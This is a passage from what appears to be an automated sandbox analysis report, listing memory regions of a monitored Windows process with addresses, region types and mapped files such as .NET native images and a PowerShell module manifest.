"private_0x0000025b73a00000" filename = "" Region: id = 1085 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1086 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1087 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1088 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1089 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1090 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1091 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1092 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1093 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1094 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1095 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1096 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1097 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1098 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1099 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1100 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1101 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1102 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1103 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1104 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1105 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1106 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1107 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1108 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1109 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1110 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1111 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1112 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1113 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1114 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1115 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1116 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1117 start_va = 0x25b73e70000 end_va = 0x25b73e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e70000" filename = "" Region: id = 1118 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1119 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1120 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1121 start_va = 0x25b73e70000 end_va = 0x25b73e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e70000" filename = "" Region: id = 1122 start_va = 0x25b73e80000 end_va = 0x25b73e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e80000" filename = "" Region: id = 1123 start_va = 0x25b73e90000 end_va = 0x25b73e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e90000" filename = "" Region: id = 1124 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1125 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1126 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1127 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1128 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1129 start_va = 0x25b73e70000 end_va = 0x25b73e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e70000" filename = "" Region: id = 1130 start_va = 0x25b73e80000 end_va = 0x25b73e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e80000" filename = "" Region: id = 1131 start_va = 0x25b73e90000 end_va = 0x25b73e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e90000" filename = "" Region: id = 1132 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1133 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1134 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1135 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1136 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1137 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1138 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1139 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1140 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1141 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1142 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1143 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1144 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1145 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1146 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1147 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1148 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1149 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1150 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1151 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1152 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1153 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1154 start_va = 0x25b73e70000 end_va = 0x25b73e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e70000" filename = "" Region: id = 1155 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1156 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1157 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1158 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1159 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1160 start_va = 0x25b73e70000 end_va = 0x25b73e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e70000" filename = "" Region: id = 1161 start_va = 0x25b73e80000 end_va = 0x25b73e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e80000" filename = "" Region: id = 1162 start_va = 0x25b73e90000 end_va = 0x25b73e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e90000" filename = "" Region: id = 1163 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1164 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1165 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1166 start_va = 0x25b73e70000 end_va = 0x25b73e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e70000" filename = "" Region: id = 1167 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1168 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1169 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1170 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1171 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1172 start_va = 0x25b73e70000 end_va = 0x25b73e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e70000" filename = "" Region: id = 1173 start_va = 0x25b73e80000 end_va = 0x25b73e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e80000" filename = "" Region: id = 1174 start_va = 0x25b73e90000 end_va = 0x25b73e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e90000" filename = "" Region: id = 1175 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1176 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1177 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1178 start_va = 0x25b73e70000 end_va = 0x25b73e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e70000" filename = "" Region: id = 1179 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1180 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1181 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1182 start_va = 0x25b73a00000 end_va = 0x25b73a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1183 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1184 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1185 start_va = 0x25b73e70000 end_va = 0x25b73e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e70000" filename = "" Region: id = 1186 start_va = 0x7fffcc6a0000 end_va = 0x7fffcc9d9fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.runtime.serialization.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Runteb92aa12#\\dea5e931cfb592ec8ceb386f87575456\\System.Runtime.Serialization.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.runteb92aa12#\\dea5e931cfb592ec8ceb386f87575456\\system.runtime.serialization.ni.dll") Region: id = 1187 start_va = 0x7fffe4ad0000 end_va = 0x7fffe4af4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "smdiagnostics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\SMDiagnostics\\fec12741f35f039878753fdb29639f2c\\SMDiagnostics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\smdiagnostics\\fec12741f35f039878753fdb29639f2c\\smdiagnostics.ni.dll") Region: id = 1188 start_va = 0x7fffd40f0000 end_va = 0x7fffd41e1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.servicemodel.internals.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Servd1dec626#\\193c832c4548f656b3e42825f211e823\\System.ServiceModel.Internals.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.servd1dec626#\\193c832c4548f656b3e42825f211e823\\system.servicemodel.internals.ni.dll") Region: id = 1189 start_va = 0x25b73a00000 end_va = 0x25b73a06fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a00000" filename = "" Region: id = 1190 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1191 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1192 start_va = 0x25b73e70000 end_va = 0x25b73e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e70000" filename = "" Region: id = 1193 start_va = 0x25b73e80000 end_va = 0x25b73e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e80000" filename = "" Region: id = 1194 start_va = 0x25b73e90000 end_va = 0x25b73e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e90000" filename = "" Region: id = 1195 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1196 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1197 start_va = 0x25b73e70000 end_va = 0x25b73e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e70000" filename = "" Region: id = 1198 start_va = 0x25b73e80000 end_va = 0x25b73e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e80000" filename = "" Region: id = 1199 start_va = 0x25b73e90000 end_va = 0x25b73e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e90000" filename = "" Region: id = 1200 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1201 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1202 start_va = 0x25b73e70000 end_va = 0x25b73e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e70000" filename = "" Region: id = 1203 start_va = 0x25b73e80000 end_va = 0x25b73e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e80000" filename = "" Region: id = 1204 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1205 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1206 start_va = 0x25b73e70000 end_va = 0x25b73e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e70000" filename = "" Region: id = 1207 start_va = 0x25b73e80000 end_va = 0x25b73e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e80000" filename = "" Region: id = 1208 start_va = 0x25b73e90000 end_va = 0x25b73e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e90000" filename = "" Region: id = 1209 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1210 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1211 start_va = 0x25b73e70000 end_va = 0x25b73e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e70000" filename = "" Region: id = 1212 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1213 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1214 start_va = 0x25b73e70000 end_va = 0x25b73e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e70000" filename = "" Region: id = 1215 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1216 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1217 start_va = 0x25b73e70000 end_va = 0x25b73e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e70000" filename = "" Region: id = 1218 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1219 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1220 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1221 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1222 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1223 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1224 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1225 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1226 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1227 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1228 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1229 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1230 start_va = 0x653f050000 end_va = 0x653f08ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000653f050000" filename = "" Region: id = 1231 start_va = 0x25b73a10000 end_va = 0x25b73a10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psd1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1") Region: id = 1232 start_va = 0x653f090000 end_va = 0x653f10ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000653f090000" filename = "" Region: id = 1233 start_va = 0x25b73e60000 end_va = 0x25b73e87fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 1234 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1235 start_va = 0x7fff735d0000 end_va = 0x7fff735dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff735d0000" filename = "" Region: id = 1236 start_va = 0x7fff735e0000 end_va = 0x7fff735effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff735e0000" filename = "" Region: id = 1237 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1238 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1239 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1240 start_va = 0x25b73e70000 end_va = 0x25b73e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e70000" filename = "" Region: id = 1241 start_va = 0x25b73e80000 end_va = 0x25b73e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e80000" filename = "" Region: id = 1242 start_va = 0x25b73e90000 end_va = 0x25b73e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e90000" filename = "" Region: id = 1243 start_va = 0x25b73ea0000 end_va = 0x25b73eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73ea0000" filename = "" Region: id = 1244 start_va = 0x25b73eb0000 end_va = 0x25b73ebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73eb0000" filename = "" Region: id = 1245 start_va = 0x25b73ec0000 end_va = 0x25b73ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73ec0000" filename = "" Region: id = 1246 start_va = 0x25b73ed0000 end_va = 0x25b73edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73ed0000" filename = "" Region: id = 1247 start_va = 0x25b73ee0000 end_va = 0x25b73eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73ee0000" filename = "" Region: id = 1248 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1249 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1250 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1251 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1252 start_va = 0x25b73e70000 end_va = 0x25b73e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e70000" filename = "" Region: id = 1253 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1254 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1255 start_va = 0x25b73e70000 end_va = 0x25b73e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e70000" filename = "" Region: id = 1256 start_va = 0x7fff735f0000 end_va = 0x7fff735fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff735f0000" filename = "" Region: id = 1257 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1258 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = 